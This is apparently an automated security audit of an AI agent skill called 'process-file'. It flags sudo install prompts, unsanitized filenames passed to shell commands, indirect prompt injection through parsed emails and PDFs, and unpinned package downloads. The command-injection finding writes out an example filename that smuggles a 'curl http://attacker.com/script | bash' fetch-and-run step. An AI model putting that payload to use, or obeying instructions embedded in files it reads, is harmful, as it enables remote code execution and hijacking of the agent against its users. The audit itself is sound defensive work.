process-file
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH
Tags: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- [Privilege Escalation] (HIGH): The skill instructions explicitly direct the agent to prompt the user to execute `sudo apt install maildir-utils` if the tool is missing. Having an AI agent tell users to run commands as root is a high-risk pattern: if the package name or the command text is tampered with, the agent ends up asking the user to install attacker-chosen software with root privileges.
- [Command Execution] (HIGH): The workflow uses the shell commands `mu view <filepath>` and `markitdown <filepath>` to process files. There is no evidence of filename sanitization or escaping. If the filename is interpolated into a command string that is handed to a shell, a maliciously crafted filename (e.g., `file.eml; curl http://attacker.com/script | bash`) is parsed as additional commands and leads to arbitrary command execution on the host system.
- [Indirect Prompt Injection] (LOW): The skill processes untrusted external data such as emails (.eml), PDFs, and Office documents.
- Ingestion points: Files provided by the user or identified in the project directory are parsed into text.
- Boundary markers: None. The extracted content is passed directly to the language model for 'Content Analysis' and 'Infer user intent' without delimiters or instructions to ignore embedded commands.
- Capability inventory: The skill can execute shell commands, read/write files via integrated skills, and suggest storage locations.
- Sanitization: None mentioned. Malicious instructions inside an email or PDF could manipulate the agent's behavior during the analysis phase.
- [External Downloads] (MEDIUM): The skill depends on external packages (`maildir-utils`, `markitdown`) and instructs the agent to facilitate their installation. While `markitdown` is a known Microsoft tool, the skill does not pin versions or verify package integrity, so a misconfigured environment (for example, an untrusted package source) could result in a compromised version being installed.
Recommendations
- AI detected serious security threats
Audit Metadata